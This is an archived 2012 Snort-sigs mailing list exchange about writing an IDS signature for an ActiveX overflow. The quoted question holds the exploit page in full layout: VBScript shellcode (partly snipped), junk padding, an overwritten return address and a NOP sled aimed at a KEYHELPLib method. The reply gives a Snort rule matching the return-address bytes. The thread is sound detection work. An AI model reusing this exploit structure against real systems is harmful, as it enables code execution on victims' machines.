[Snort-sigs] Problem writing a sig to capture vbscript unescape sequence

Balasubramaniam Natarajan bala150985 at ...2420...
Sat May 19 02:36:16 EDT 2012


Hi Bob,

See if this works

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible ActiveX
overflow via VB Script"; flow:established,from_server; content:"|65 69 70
20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 37 25 34 31 25 34 31 25 37 65
22 29|"; sid:10000111; rev:1;)

On Fri, May 18, 2012 at 11:22 PM, Bob Huber <roberthuberjr at ...144...> wrote:

> I'm trying to write a sig for this ActiveX overflow:
>
> <html>
> <body>
> <object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C'
> id='KEYHELPLib' />
> </object>
> <script language='vbscript'>
> //executing calc
> scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49")
> & _
>              ...SNIP...
>              unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
> jnk = string(537,"A")
> eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
> nop = string(16,unescape("%90"))
> mapID=1
> pstrChmFile= jnk + eip + nop + scode
> pstrFrame="aaaaaaaa"
> 'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
> KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
> </script>
> </body>
> </html>
>
> The problem I'm having is trying to get a content match off of the line -
>    eip = unescape("%67%41%41%7e")
> I can't figure out how to match that content.  I'm running both 2.8.5 and
> 2.9.2.  I was assuming it would see the <script> tag and it would try to
> decode javascript, and maybe that was the problem.  I've tried file_data,
> I've tried pkt_data. I've turned off javascript normalization, I've turned
> off extended_response_inspection.  No luck.
>
> Any help appreciated.
>
> Bob
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
> http://www.snort.org
>
>
> Please visit http://blog.snort.org for the latest news about Snort!
>



-- 
Regards,
Balasubramaniam Natarajan
www.etutorshop.com/moodle/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20120519/4f38c057/attachment.html>


More information about the Snort-sigs mailing list